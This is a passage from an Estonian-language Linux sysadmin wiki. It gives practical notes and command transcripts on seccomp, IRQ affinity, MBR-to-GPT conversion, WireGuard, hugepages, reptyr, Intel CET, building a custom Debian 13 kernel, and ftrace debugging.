timeout 20 psql -h 10.0.6.174 -U monitoring baas -c "select now();" >> ${LOG}/psql-10.0.6.174-monitoring-portaal_${AEG}.log

rm /tmp/osres.lock

fi
</pre>

===seccomp===

====Tööpõhimõte====

TODO

====Misc====

<pre>
root@dh-minio-01:~# cat seccomp-list.sh
for pid in $(ls /proc | grep -E '^[0-9]+$'); do
status=$(grep "Seccomp:" /proc/$pid/status 2>/dev/null | awk '{print $2}')
if [ "$status" = "2" ]; then
name=$(cat /proc/$pid/comm)
echo "PID $pid ($name) is SECCOMP FILTERED"
fi
done
</pre>

nt Debian v. 13 arvutis

<pre>
root@dh-minio-01:~# sh seccomp-list.sh
PID 11405 (rsyslogd) is SECCOMP FILTERED
PID 155380 (nginx) is SECCOMP FILTERED
PID 155381 (nginx) is SECCOMP FILTERED
PID 155382 (nginx) is SECCOMP FILTERED
PID 157836 (postgres) is SECCOMP FILTERED
PID 157837 (postgres) is SECCOMP FILTERED
PID 157838 (postgres) is SECCOMP FILTERED
PID 157840 (postgres) is SECCOMP FILTERED
PID 157841 (postgres) is SECCOMP FILTERED
PID 157842 (postgres) is SECCOMP FILTERED
PID 297 (systemd-journal) is SECCOMP FILTERED
PID 322 (systemd-timesyn) is SECCOMP FILTERED
PID 353 (systemd-udevd) is SECCOMP FILTERED
PID 653 (systemd-logind) is SECCOMP FILTERED
</pre>

====Kasulikud lisamaterjalid====

* https://oneuptime.com/blog/post/2026-03-02-how-to-use-seccomp-to-restrict-system-calls-on-ubuntu/view

===ConsoleKit===

2017 seisuga paistab see olevat vananenud tehnoloogia, kasutatakse systemd-logind.

Kasulikud lisamaterjalid

* TODO

===Võrgukaart - CPU affinity===

TODO

Järgneval viisil tegutsemiseks on vaja ircbalance deemoni töö lõpetada

# systemctl stop irqbalance

Võrgukaardi multi-queue omadused

<pre>
# ethtool -l eth0
Channel parameters for eth0:
Pre-set maximums:
RX: 8
TX: 8
Other: 0
Combined: 0
Current hardware settings:
RX: 2
TX: 2
Other: 0
Combined: 0
</pre>

Võrgukaardi ja cpu ja interrupt vahelised seosed

<pre>
# cat /proc/interrupts | egrep "CPU|eth"
CPU0 CPU1 CPU2 CPU3 CPU4 CPU5 CPU6 CPU7
48: 0 0 0 38 0 1339257 461106 0 PCI-MSI 2097152-edge eth0-0
49: 0 0 1 67 2071270 0 0 143901 PCI-MSI 2097153-edge eth0-1
57: 0 0 1738287 4 0 0 0 0 PCI-MSI 2099200-edge eth1-0
58: 0 3918708 0 38 0 0 0 0 PCI-MSI 2099201-edge eth1-1
</pre>

kus

* 48, 49 jnt on interrupt number

<pre>
# cat /proc/irq/57/smp_affinity
04
</pre>

kus

* hex 04 vastav väärtus on bin 0000 0100
* bin väärtuses olev paremalt kolmandal positsioonil olev '1' tähistab süsteemis olevat kolmandat protsessorit, st alates nullist lugedes CPU2

Affinity muutmiseks, st selle muutmiseks, milline cpu tegeleb millise võrgukaardiga (või võrgukaardi queue'ga) sobib öelda uus cpu number, nt seostamiseks CPU3 protsessoriga

# echo 08 > /proc/irq/57/smp_affinity

CPU numeratsioon

* 0000 0001 (bin) ehk 01 (hex) - esimene (CPU0)
* 0000 0010 (bin) ehk 02 (hex) - teine (CPU1)
* 0000 0100 (bin) ehk 04 (hex) - kolmas (CPU2)
* ...
* 1000 0000 (bin) ehk 80 (hex) - kahesas (CPU7)

Tundub, et võrgukaardi queue'de arvu muutmiseks sobib öelda

# ethtool -L eth0 tx 2
# ethtool -L eth0 rx 2

Siin kirjeldatud viisil tehtud seadistused ei kehtestu peale rebooti.

===Watchdog===

TODO

Kasulikud lisamaterjalid

* https://github.com/miniwark/miniwark-howtos/wiki/Hardware-Watchdog-Timer-setup-on-Ubuntu-12.04
* http://odroid.com/dokuwiki/doku.php?id=en:odroid_linux_watchdog
* https://pve.proxmox.com/wiki/High_Availability
* https://pve.proxmox.com/wiki/High_Availability_Cluster_4.x
* https://lesterlo.wordpress.com/2017/06/23/enable-ipmi-watchdog/
* http://www.madore.org/~david/linux/iTCO-wdt-test.html
* https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/virtualization_administration_guide/section-libvirt-dom-xml-watchdog
* https://casesup.com/using-the-nmi-watchdog-to-detect-hangs/
* https://gist.githubusercontent.com/wmealing/5523247/raw/4dc0474cabc35a9b79cd49fc7eab1f027ea80606/nmi-interrupts.txt
* https://github.com/spotify/linux/blob/master/Documentation/nmi_watchdog.txt

===Softdog===

TODO

===Misc===

* Kopeerimise kiiruse kontrollimine pipe peal

# apt-get install pv
# ssh root@192.168.112.113 'cd /tmp && dd if=/dev/pve/vm-109-disk-1 bs=1M' | pv -L 15m | dd of=/dev/kvmvg/vm-1019-disk-1 bs=1M

===Viber===

Viber https://www.viber.com/ on suhtlemistarkvara, paigaldamiseks sobib öelda nt Debian v. 8 ja v. 9 keskkonnas

# apt-get install libxcb-xkb1 libxcb-icccm4 libxcb-image0 libxcb-render-util0
# apt-get install libqt5gui5
# dpkg -i viber.com

ja käivitamiseks

$ /opt/viber/Viber

Kasulikud lisamaterjalid

* https://daksaitay.noblogs.org/post/2017/01/17/viber-on-debian-8-jessie-desktop/
* http://www.roydoer.com/viber-on-ubuntu-14-04-64bit/

===KeePassX===

MÄRKUS 20190126 - tundub, et õigem projekt on https://en.wikipedia.org/wiki/KeePassXC (C nagu community ja paketinimi keepassxc)

# apt-get intall keepassx

andmebaasi failinime lõpp on .kdbx

===Password Gorilla===

# apt-get install password-gorilla

andmebaasi failinime lõpp on .psafe3

===2018 - Debian v. 9 Stretch paigaldamine===

Installeris menüüde läbimise näide

* Installeri keel - "English"
* Select your location: Other > Europe > Estonia
* Configure locales - United States - en_US.UTF-8
* Keymap to use - Estonian
* Hostname - ühekohalinenimi (vist tulemus sõltub kas võrk eelnevalt just seadistati dhcp'ga, antud näites nii oli)
* Domain name - sise.moraal.ee
* Root password - parool
* User name - nimi
* User password - parool
* partitsioonimine (nt efi + lvm)
* Configure package manager - Estonia - ftp.ee.debian.org
* HTTP proxy - tühi
* Contest - no
* Software selection - OpenSSH server ja standard system utilities
* Reboot

===2019 - Debian v. 10 Buster paigaldamine===

Installeris menüüde läbimise näide

* Installeri keel - "English"
* Select your location: Other > Europe > Estonia
* Configure locales - United States - en_US.UTF-8
* Keymap to use - Estonian
* Hostname - ühekohalinenimi (vist tulemus sõltub kas võrk eelnevalt just seadistati dhcp'ga, antud näites nii oli)
* Domain name - sise.moraal.ee
* Root password - parool
* User name - nimi
* User password - parool
* partitsioonimine (nt efi + lvm)
* Configure package manager - Estonia - ftp.ee.debian.org
* HTTP proxy - tühi
* Contest - no
* Software selection - OpenSSH server ja standard system utilities
* Reboot

===linux-perf===

====Paigldamine====

Paigaldamiseks sobib öeld

# apt-get install linux-perf

====Kasutamine====

perf.data faili salvestamine käesolevasse kataloogi

# /usr/bin/perf record -e sched:sched_process_exec -a

Salvestatud andmete loetaval kujul esitamine

# /usr/bin/perf script --header

====Kasulikud lisamaterjalid====

* http://www.brendangregg.com/perf.html

===Wireguard===

====Debian v. 10 Buster====

TODO

Lisada buster-backports repo

TODO

Paigaldada buster-backports repost wireguard

kus

* paigaldatakse wireguard-dkms wireguard-tools wireguard
* paigaldatakse hulka bui

====Debian v. 11 Bullseye====

# apt-get install wireguard

====Debian v. 12 Bookworm====

Töötamine paistab nö serveri poolel

<pre>
root@debian-vpn:~# systemctl status wg-quick@wg0
● wg-quick@wg0.service - WireGuard via wg-quick(8) for wg0
Loaded: loaded (/lib/systemd/system/wg-quick@.service; enabled; preset: enabled)
Active: active (exited) since Tue 2025-04-01 16:46:09 EEST; 9 months 19 days ago
Docs: man:wg-quick(8)
man:wg(8)
https://www.wireguard.com/
https://www.wireguard.com/quickstart/
https://git.zx2c4.com/wireguard-tools/about/src/man/wg-quick.8
https://git.zx2c4.com/wireguard-tools/about/src/man/wg.8
Main PID: 7536 (code=exited, status=0/SUCCESS)
CPU: 30ms

Apr 01 16:46:09 debian-10-vpn wg-quick[7536]: [#] ip link set mtu 1420 up dev wg0
Apr 01 16:46:09 debian-10-vpn wg-quick[7536]: [#] ip -4 route add 10.168.112.68/32 dev wg0
Apr 01 16:46:09 debian-10-vpn wg-quick[7536]: [#] ip -4 route add 10.168.112.170/32 dev wg0
Apr 01 16:46:09 debian-10-vpn wg-quick[7536]: [#] ip -4 route add 10.168.112.15/32 dev wg0
Apr 01 16:46:09 debian-10-vpn wg-quick[7536]: [#] ip -4 route add 10.168.112.14/32 dev wg0
Apr 01 16:46:09 debian-10-vpn wg-quick[7536]: [#] ip -4 route add 10.168.112.13/32 dev wg0
Apr 01 16:46:09 debian-10-vpn wg-quick[7536]: [#] ip -4 route add 10.168.112.12/32 dev wg0
Apr 01 16:46:09 debian-10-vpn wg-quick[7536]: [#] ip -4 route add 10.168.112.11/32 dev wg0
Apr 01 16:46:09 debian-10-vpn wg-quick[7536]: [#] ip -4 route add 10.168.112.10/32 dev wg0
Apr 01 16:46:09 debian-10-vpn systemd[1]: Finished wg-quick@wg0.service - WireGuard via wg-quick(8) for wg0.
</pre>

Seadistusfail

<pre>
/etc/wireguard/wg0.conf
</pre>

===MBR -> GPT partitsioonitabeli teisendamine===

====Tööpõhimõte====

* MBR partitsioonitabel hõlvab tavalisel lihtsal juhul plokkseadme esimsesed 512 Baiti
* GPT partitsioonitabel hõlvab tavaliselt plokkseadme esimsed ja viimased 34 * 512 Baiti
* tundub, et seoses uuema ajal 1 MBait piirile asjade sättimisega algab nii MBR kui GPT puhul esimene partitsioon 2048'ndal sektoril; st plokkseadme alguses on rikkalikult vaba ruumi teisendatud gpt jaoks; probleemiks võib olla, plokkseadme lõpus pole piisavalt vaba ruumi backup gpt jaoks
* sektori suurus on 512 Baiti
* MBR partitsioonitabelis on ühte partitsiooni puudutava sissekande suurus 16 baiti, millest 4 baiti ehk 16 bitti on kasutusel partitsiooni moodustavate sektorite hulga tähistamiseks (# echo 2^32*512/1024^3 | bc -> 2048 Gigabyte)
* GPT partitsioonitabelis on ühte partitsiooni puudutava sissekande suurus 128 baiti, millest 8 baiti ehk 64 bitti on kasutusel partitsiooni moodustavate sektorite hulga tähistamiseks (# echo 2^64*512/1024^3 | bc -> väga palju)
* muudatuse käigus partitsioone moodustavaid plokke plokkseadmel ümber ei paigutata
* kui mbr partitsioonitabelis on kasutusel ainult primaarsed partitsioonid ning ilma nö aukudeta partitsioonide vahel, siis on tulemuseks samuti ilma aukudeta üksteisele järgnevad gpt partitsioonid
* antud tekst ei kästile seda, aga boot kood asub mbr puhul esimeses 446 baidis
* gpt puhul põhimõtteliselt boot koodi ei ole kasutusel uefi põhises süsteemis (kasutatakse efi partitsiooni)

====Teisendamine====

Olgu lähtepunktiks selline plokkseadme kasutus, mbr partitsioonitabel

<pre>
# fdisk /dev/vdc -l

Disk /dev/vdc: 16 GiB, 17179869184 bytes, 33554432 sectors
Units: sectors of 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes
Disklabel type: dos
Disk identifier: 0xdaa60afa

Device Boot Start End Sectors Size Id Type
/dev/vdc1 2048 33097727 33095680 15.8G 83 Linux
</pre>

ning partitsioonil üks ext4 failisüsteem, mis on monteeritud

<pre>
# df -h -T /dev/vdc1
Filesystem Type Size Used Avail Use% Mounted on
/dev/vdc1 ext4 16G 1.7G 13G 12% /mnt/vdc1
</pre>

Eesmärk on teisendada partitsioonitabel gpt kujule säilitades seejuures failisüsteemi sisu. Selleks sobib kasutada sellist protseduuri, esmalt monteerida failisüsteem lahti

# umount /dev/vdc1

seejärel teha mbr partitsioonitabelist varukoopia

# dd if=/dev/vdc of=backup.mbr bs=512 count=1

gdisk ehk 'gpt fdisk' programm sobib gpt partitsioonitabeli haldamiseks, sealhulgas vaikimisi ta püüab mbr partitsioonitabeli teisendada gpt kujule. See on tehniliselt tavaliselt võimalik kuna mbr asub plokkseadme alguses ja seal on nö kasutamata ruumi.

<pre>
# gdisk /dev/vdc
GPT fdisk (gdisk) version 0.8.10

Partition table scan:
MBR: MBR only
BSD: not present
APM: not present
GPT: not present

***************************************************************
Found invalid GPT and valid MBR; converting MBR to GPT format
in memory. THIS OPERATION IS POTENTIALLY DESTRUCTIVE! Exit by
typing 'q' if you don't want to convert your MBR partitions
to GPT format!
***************************************************************

Command (? for help): w

Final checks complete. About to write GPT data. THIS WILL OVERWRITE EXISTING
PARTITIONS!!

Do you want to proceed? (Y/N): Y
OK; writing new GUID partition table (GPT) to /dev/vdc.
The operation has completed successfully.
</pre>

kus

* programm tuvastab esmalt, et plokkseadmel on kasutusel MBR partitsioonitabel
* w abil tehakse muudatus
* Y abil kirjutatakse muudatus üles

Kuna Linux operatsioonisüsteemi puhul eristatakse plokkseadmel ja mälus olevat seisu plokkseadme kasutusest, siis tuleks täielikuks muudatuse kehtestamiseks teha lihtsalt reboot arvutile või öelda

# partprobe /dev/vdc

Tulemusena kasutatakse plokkseadmel gpt partitsioonitabelit

<pre>
# fdisk /dev/vdc -l

Disk /dev/vdc: 16 GiB, 17179869184 bytes, 33554432 sectors
Units: sectors of 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes
Disklabel type: gpt
Disk identifier: 469E6D74-0022-4200-B0FD-2C5FAED7DCAD

Device Start End Sectors Size Type
/dev/vdc1 2048 33302527 33300480 15.9G Linux filesystem
</pre>

====Muudatuse tagasivõtmine====

Muudatuse tagasivõtmiseks sobib öelda (kuigi nii jääb alles plokkseadme lõppu gpt backup; teatud bios'ide puhul võib see tekitada probleeme, bios on agar ja taastab selle alusel primaarse gpt partitsioonitabeli)

# umount /mnt/vdc1
# dd if=backup.mbr of=/dev/vdc bs=512 count=1
# partprobe /dev/vdc
# mount /dev/vdc1 /mnt/vdc1

====Kasulikud lisamaterjalid====

* https://easylinuxji.blogspot.com/2018/12/what-is-disk-partitioning-disk.html
* https://dannyda.com/2021/05/07/how-to-convert-ubuntu-20-04-1-lts-os-disk-from-mbr-to-gpt-gpt-to-mbr-without-losing-data/
* http://www.rodsbooks.com/gdisk/mbr2gpt.html

===Kasutajakonto operatsioonid===

Konto lukustamine kusjuures see takistab ainult parooliga autentimist, nt ssh võtmega saab sisse

# passwd -l kasutajanimi
# passwd -u kasutajanimi

Konto expire, see takistab igasuguseid kanaleid (eeldab, et pam vms on seadistatud expirega tegelema)

# usermod --expiredate 1 kasutajanimi

===grep kasutamine===

Perl regulaaravalidsega

<pre>
TODO
</pre>

Järjestikulised grep'id ei toimi vahel, aitab nt

<pre>
# tail -f /var/log/pveproxy/access.log | grep --line-buffered "PUT" | grep --line-buffered firewall | grep --line-buffered option
</pre>

===Debian v. 12 ext4 failisüsteem read-only olekus===

Tundub, et kõige tavalisem Debian v. 12 paigaldus, mis kasutab ext4 failisüsteemi (lvm kihi peal) käitub read-only olekus selliselt, et avatud failidesse mingil määral näiliselt kirjutamised jätkuvad. Seejuures kirjutajale jääb mulje, et kirjutamine õnnestus lõpetada edukalt. (Samal ajal uusi faile ei saa tekitada, olemasolevate failide muutmisi ei saa alustada.) Nähtuse jälgimiseks-taaskordamiseks-esilekutsumiseks sobib selline protseduur

1. Proxmox PVE keskkonnas töötab lvm põhisel storage'l Debian v. 12 virtuaalne arvuti; arvutis on kasutusel lvm ja sellel ext4 failisüsteem (lvm ei ole oluline)

2. Alustatakse eemalt pv abil piiratud kiirusega faili kopeerimist (etteruttavalt on siin toodud ära ka kopeeriv cat programmi edukas exit code; fail.img-4 on 36 MB suur)

$ cat fail.img-4 | ssh root@192.168.110.246 'pv -q -L3500K | cat > /root/tere4; echo $?'
0

3. umbes kolmveerandi kopeerimise pealt viiakse PVE host peal virtuaalsele arvutile vastav plokkseade read-only olekusse

# lvchange -pr vg_data/vm-615-disk-2

4. ootus on, et virtuaalne arvuti reageerib sellele oma juurfailisüsteemi read-only olekusse lülitamisega

5. ootus on, et kopeerimine lõpeb edukalt

6. ootus on, et vaatamata read only olekule Debian operatsioonisüsteemi saab veel natuke kasutada, ja küsida (tulemus klapib orig fail.img-4 failiga)

# sha256sum /root/tere4

7. virtuaalne arvuti stop'itakse PVE abil

8. viiakse plokkseade tagasi rw režiimi

# lvchange -prw vg_data/vm-615-disk-2

9. käivitatakse virtuaalne arvuti

10. kõnealune fail, mis näiliselt õnnestus edukalt kopeerida, on väiksema suurusega (või suurusega null)

Märkused

* analoogselt käitub Ubuntu v. 22.04
* Ubuntu v. 22.04 (ja tõenäoliselt Debian v. 12) + ext3 failisüsteem nö hoiavad kinni read-only lubadusest ja sellist nähtust ei toimu
* Vanemad Ubuntu ja Debian versioonid hoiavad kinni read-only lubadusest ja sellist nähtust ei toimu
* PVE host peal lvchange ütlemisele alternatiiviks on virtuaalse arvuti siseselt öelda

# echo u > /proc/sysrq-trigger

* lisaks PVE keskkonnale toimub analoogiline nähtus vmware virtuaalse arvutiga

===machine-id reset===

<pre>
# rm /etc/machine-id /var/lib/dbus/machine-id
# dbus-uuidgen | tee /etc/machine-id > /var/lib/dbus/machine-id
# chmod 0444 /etc/machine-id
# ls -ld /etc/machine-id /var/lib/dbus/machine-id
-r--r--r-- 1 root root 33 Apr 7 19:18 /etc/machine-id
-rw-r--r-- 1 root root 33 Apr 7 19:18 /var/lib/dbus/machine-id
</pre>

===Hugepages===

* TLB - Translation Lookaside Buffer
* THP - Transparent Huge Pages

Nö tavalises proxmox pve arvutis on selline hugepagendus

<pre>
root@pm60-trt:~# df -a -t hugetlbfs
Filesystem 1K-blocks Used Available Use% Mounted on
hugetlbfs 0 0 0 - /dev/hugepages
</pre>

Tundub, et niipea kui käivitatakse virtuaalne arvuti, mis sisaldab parameetrit 'hugepages: ...' tekitatakse kaks juurde

<pre>
root@valgustaja1:~# df -a -t hugetlbfs
Filesystem 1K-blocks Used Available Use% Mounted on
hugetlbfs 0 0 0 - /dev/hugepages
hugetlbfs 0 0 0 - /run/hugepages/kvm/2048kB
hugetlbfs 0 0 0 - /run/hugepages/kvm/1048576kB
</pre>

ning seda tehakse läbi nö käigult konstrueeritud systemd mount unitite

<pre>
root@valgustaja1:~# systemctl | grep huge
dev-hugepages.mount loaded active mounted Huge Pages File System
run-hugepages-kvm-1048576kB.mount loaded active mounted /run/hugepages/kvm/1048576kB
run-hugepages-kvm-2048kB.mount loaded active mounted /run/hugepages/kvm/2048kB
</pre>

Üks viis 1G hugepagendust lähtestada on kasutades sellist kernel-command-line'i

<pre>
root@valgustaja1:~# cat /proc/cmdline
initrd=\EFI\proxmox\6.8.8-2-pve\initrd.img-6.8.8-2-pve root=ZFS=rpool/ROOT/pve-1 boot=zfs default_hugepagesz=1G hugepagesz=1G hugepages=24
</pre>

Tulemusena paistab

<pre>
root@valgustaja1:~# grep -i huge /proc/meminfo
AnonHugePages: 0 kB
ShmemHugePages: 0 kB
FileHugePages: 0 kB
HugePages_Total: 24
HugePages_Free: 24
HugePages_Rsvd: 0
HugePages_Surp: 0
Hugepagesize: 1048576 kB
Hugetlb: 25165824 kB
</pre>

ning

<pre>
root@valgustaja1:~# hugeadm --explain
Total System Memory: 192906 MB

Mount Point Options
/dev/hugepages rw,relatime,pagesize=1024M
/run/hugepages/kvm/2048kB rw,relatime,pagesize=2M
/run/hugepages/kvm/1048576kB rw,relatime,pagesize=1024M

Huge page pools:
Size Minimum Current Maximum Default
2097152 0 0 0
1073741824 24 24 24 *

Huge page sizes with configured pools:
1073741824

...
</pre>

Kasulikud lisamaterjalid

* https://wiki.postgresql.org/images/7/7d/PostgreSQL_and_Huge_pages_-_PGConf.2019.pdf
* https://pganalyze.com/blog/5mins-postgres-tuning-huge-pages

===reptyr===

reptyr ehk reparenting-terminal võimaldab saada uuesti kontakti kaotatud kuid eksisteeriva terminaliga. Paigaldamiseks sobib öelda

# apt-get install reptyr

Nt apt-get dist-upgrade programm käivitati, aga füüsiline konsool millelt seda tehti riknes. Mujalt arvutisse logides võib olla dist-upgrade tegevus peatunud nt sellises kohas

<pre>
# tail -f /var/log/apt/term.log
...
No DKMS packages installed: not changing Secure Boot validation state.
Setting up libmpc3:amd64 (1.3.1-1) ...
Setting up systemd-timesyncd (252.30-1~deb12u2) ...

Configuration file '/etc/systemd/timesyncd.conf'
==> Modified (by you or by a script) since installation.
==> Package distributor has shipped an updated version.
What would you like to do about it ? Your options are:
Y or I : install the package maintainer's version
N or O : keep your currently-installed version
D : show the differences between the versions
Z : start a shell to examine the situation
The default action is to keep your current version.
*** timesyncd.conf (Y/I/N/O/D/Z) [default=N] ?
</pre>

Ning terminali olukord

<pre>
root@tm-tartu-x470:~# ps auxf | less -N
..
135 root 1097 0.0 1.8 74500 18448 ? S Oct13 0:05 apt-get dist-upgrade
136 root 23408 0.0 0.6 11768 6388 pts/1 Ss+ Oct13 0:01 \_ /usr/bin/dpkg --status-fd 25 --configure --
...
</pre>

Osutub, et terminaliga saab taas kontakti öeldes, ja jätkates seejärel sisestusi peatunud kohast. NB! reptyr töötamine jätkub nö pimedast kohast, klaviatuurilt tuleb sisestada nii nagu asjakohane, nt antud juhul Enter sobib küsimusele 'timesyncd.conf (Y/I/N/O/D/Z) [default=N]' eitavalt vastamiseks

<pre>
root@tm-tartu-x470:~# /home/imre/reptyr 23408
[-] Timed out waiting for child stop.

Setting up libevent-core-2.1-7:amd64 (2.1.12-stable-8) ...
Setting up libatomic1:amd64 (12.2.0-14) ...
Setting up libvariable-magic-perl (0.63-1+b1) ...
Setting up udev (252.30-1~deb12u2) ...
Setting up libevent-2.1-7:amd64 (2.1.12-stable-8) ...
Setting up libio-html-perl (1.004-3) ...
Setting up libss2:amd64 (1.47.0-2) ...
Setting up libpod-parser-perl (1.65-1) ...
Setting up autopoint (0.21-12) ...
Setting up libb-hooks-op-check-perl:amd64 (0.22-2+b1) ...
</pre>

Seejärel jätkub apt-get dist-upgrade osakonnaga suhtlemine tavalisel viisil.

===CET - Intel Control-flow Enforcement Technology===

Protsessori tugi

<pre>
root@pve-01:~# lscpu | grep -i shstk
Flags: fpu vme de pse ... user_shstk ...
</pre>

ning nt https://www.intel.com/content/www/us/en/products/sku/232391/intel-xeon-gold-6448h-processor-60m-cache-2-40-ghz/specifications.html

<pre>
Intel® Control-Flow Enforcement Technology
</pre>

Kerneli tugi

<pre>
root@pve-01:~# grep SHADOW /boot/config-6.8.4-3-pve
CONFIG_X86_USER_SHADOW_STACK=y
</pre>

programmi tugi, 'Properties: x86 feature: IBT, SHSTK'

<pre>
root@trainer-01-rws:~# readelf -n /usr/sbin/sshd

Displaying notes found in: .note.gnu.property
Owner Data size Description
GNU 0x00000020 NT_GNU_PROPERTY_TYPE_0
Properties: x86 feature: IBT, SHSTK
x86 ISA needed: x86-64-baseline

Displaying notes found in: .note.gnu.build-id
Owner Data size Description
GNU 0x00000014 NT_GNU_BUILD_ID (unique build ID bitstring)
Build ID: 652d8ffe728a6800d02ee146e82201f0080069de

Displaying notes found in: .note.ABI-tag
Owner Data size Description
GNU 0x00000010 NT_GNU_ABI_TAG (ABI version tag)
</pre>

käesolev olukord

<pre>
root@pve-01:~# cat /proc/2266/status | grep -i thread_fe
x86_Thread_features:
x86_Thread_features_locked:
</pre>

Kasulikud lisamaterjalid

* https://en.wikipedia.org/wiki/Control-flow_integrity
* https://ubuntu.com/blog/whats-new-in-security-for-ubuntu-24-04-lts

===pigz abil pakkimine===

# time tar -I pigz -cf ../20250507/rakendus-14-main_ee-20250507.tgz main_ee

===Debian v. 13 Trixie kerneli kompileerimine===

Väited

* tegevused toimuvad pve v. 8.4 virtuaalses arvutis, uefi jne
* kompileerimiseks on vajalik ca 40 G ruumi failisüsteemis
* arvutil on 32 cpu ja 24g mälu
* kompileerimine võtab aega ca 10 minutit

Nt eesmärgiga lisada süsteemi rtc_efi tuuma moodul ning käivitamisel lülitada välja rtc_cmos moodul, tavaliselt paistab rtc nii

<pre>
root@pm60-trt:~# dmesg | grep rtc
[ 5.472677] rtc_cmos 00:01: RTC can wake from S4
[ 5.477720] rtc_cmos 00:01: registered as rtc0
[ 5.482245] rtc_cmos 00:01: setting system clock to 2025-07-05T17:49:27 UTC (1751737767)
[ 5.490391] rtc_cmos 00:01: alarms up to one month, y3k, 114 bytes nvram
</pre>

Kompileerimine

<pre>
# apt-get install build-essential libncurses-dev
# apt-get build-dep linux
# linux-source-6.12

# su - imre
$ mkdir 20251001
$ cd 20251001
$ tar xaf /usr/src/linux-source-6.12.tar.xz
$ cd linux-source-6.12
</pre>

Kostümiseerimine

<pre>
imre@kernel-deb-13-01:~/20251001/linux-source-6.12$ cp /boot/config-6.12.48+deb13-amd64 .config
imre@kernel-deb-13-01:~/20251001/linux-source-6.12$ make menuconfig
imre@kernel-deb-13-01:~/20251001/linux-source-6.12$ joe drivers/rtc/Kconfig
imre@kernel-deb-13-01:~/20251001/linux-source-6.12$ joe .config
imre@kernel-deb-13-01:~/20251001/linux-source-6.12$ make menuconfig

imre@kernel-deb-13-01:~/20251001-2/linux-source-6.12$ diff /boot/config-6.12.48+deb13-amd64 .config
5c5
< CONFIG_CC_VERSION_TEXT="x86_64-linux-gnu-gcc-14 (Debian 14.2.0-19) 14.2.0"
---
> CONFIG_CC_VERSION_TEXT="gcc (Debian 14.2.0-19) 14.2.0"
36a37
> CONFIG_BUILD_SALT=""
999a1001
> CONFIG_MODULE_SIG_ALL=y
8486c8488
< CONFIG_RTC_DRV_CMOS=y
---
> CONFIG_RTC_DRV_CMOS=m
8492a8495
> CONFIG_RTC_DRV_EFI=m
10868a10872
> CONFIG_MODULE_SIG_KEY="certs/signing_key.pem"
10870a10875
> CONFIG_SYSTEM_TRUSTED_KEYS=""

imre@kernel-deb-13-01:~$ diff orig/linux-source-6.12/drivers/rtc/Kconfig 20251001/linux-source-6.12/drivers/rtc/Kconfig
1180c1180
< depends on EFI && !X86
---
> depends on EFI

imre@kernel-deb-13-01:~/20251001/linux-source-6.12$ make -j 32 bindeb-pkg
</pre>

Tulemusena

<pre>
root@kernel-deb-13-01:~# ls -ld /home/imre/20251001/linux-*
-rw-r--r-- 1 imre imre 9175852 Oct 2 00:07 /home/imre/20251001/linux-headers-6.12.48_6.12.48-2_amd64.deb
-rw-r--r-- 1 imre imre 109643260 Oct 2 00:07 /home/imre/20251001/linux-image-6.12.48_6.12.48-2_amd64.deb
-rw-r--r-- 1 imre imre 999103852 Oct 2 00:08 /home/imre/20251001/linux-image-6.12.48-dbg_6.12.48-2_amd64.deb
-rw-r--r-- 1 imre imre 1395812 Oct 2 00:06 /home/imre/20251001/linux-libc-dev_6.12.48-2_amd64.deb
-rw-rw-r-- 1 imre imre 6109 Oct 2 00:09 /home/imre/20251001/linux-upstream_6.12.48-2_amd64.buildinfo
-rw-rw-r-- 1 imre imre 2260 Oct 2 00:09 /home/imre/20251001/linux-upstream_6.12.48-2_amd64.changes
</pre>

Paigaldamine

<pre>
root@kernel-deb-13-01:~# dpkg -i /home/imre/20251001/linux-image-6.12.48_6.12.48-2_amd64.deb

root@kernel-deb-13-01:~# find /lib/modules/6.12.48 -name rtc-efi\* -ls
559702 8 -rw-r--r-- 1 root root 4708 Oct 2 00:05 /lib/modules/6.12.48/kernel/drivers/rtc/rtc-efi.ko.xz
</pre>

Kasutamine, nt grub bootloaderisse sekkumisel näidata

<pre>
linux /boot/vmlinuz-6.12.48 root=/dev/mapper/system-root ro efi=runtime modprobe.blacklist=rtc_cmos
initrd /boot/initrd.img-6.12.48
</pre>

Tulemusena

<pre>
root@kernel-deb-13-01:~# uname -a
Linux kernel-deb-13-01 6.12.48 #2 SMP PREEMPT_DYNAMIC Thu Oct 2 00:05:59 EEST 2025 x86_64 GNU/Linux

root@kernel-deb-13-01:~# dmesg -T | grep rtc
[Thu Oct 2 00:11:10 2025] Command line: BOOT_IMAGE=/boot/vmlinuz-6.12.48 root=/dev/mapper/system-root ro efi=runtime modprobe.blacklist=rtc_cmos
[Thu Oct 2 00:11:10 2025] Kernel command line: BOOT_IMAGE=/boot/vmlinuz-6.12.48 root=/dev/mapper/system-root ro efi=runtime modprobe.blacklist=rtc_cmos
[Thu Oct 2 00:11:11 2025] rtc-efi rtc-efi.0: registered as rtc0
[Thu Oct 2 00:11:11 2025] rtc-efi rtc-efi.0: setting system clock to 2025-10-01T21:11:09 UTC (1759353069)

root@kernel-deb-13-01:~# hwclock --show
2025-10-02 01:35:16.360299+03:00
</pre>

Kasulikud lisamaterjalid

* 'Building a custom kernel from Debian kernel source' - https://kernel-team.pages.debian.net/kernel-handbook/ch-common-tasks.html#s-common-building

===Kerneli siseste funktsioonide debugimine===

Sedasi saab veenduda, et hwclock kasutab peale eelmises punktis tehtud muudatuse 'efi runtime services' osakonda (mitte klassikalist rfc_cmos osakonda)

<pre>
root@kernel-deb-13-01:/sys/kernel/tracing# cat /sys/kernel/tracing/available_filter_functions | grep efi_ | grep time
root@kernel-deb-13-01:/sys/kernel/tracing# cd /sys/kernel/tracing
root@kernel-deb-13-01:/sys/kernel/tracing# echo > trace
root@kernel-deb-13-01:/sys/kernel/tracing# echo nop > current_tracer
root@kernel-deb-13-01:/sys/kernel/tracing# echo > set_ftrace_filter
root@kernel-deb-13-01:/sys/kernel/tracing# echo efi_read_time > set_ftrace_filter
root@kernel-deb-13-01:/sys/kernel/tracing# echo function > current_tracer
root@kernel-deb-13-01:/sys/kernel/tracing# echo 1 > tracing_on

root@kernel-deb-13-01:/sys/kernel/tracing# hwclock --show & echo "before $! after"
[1] 1525
before 1525 after
root@kernel-deb-13-01:/sys/kernel/tracing# 2025-10-02 03:05:13.888490+03:00

[1]+ Done hwclock --show

root@kernel-deb-13-01:/sys/kernel/tracing# echo 0 > tracing_on

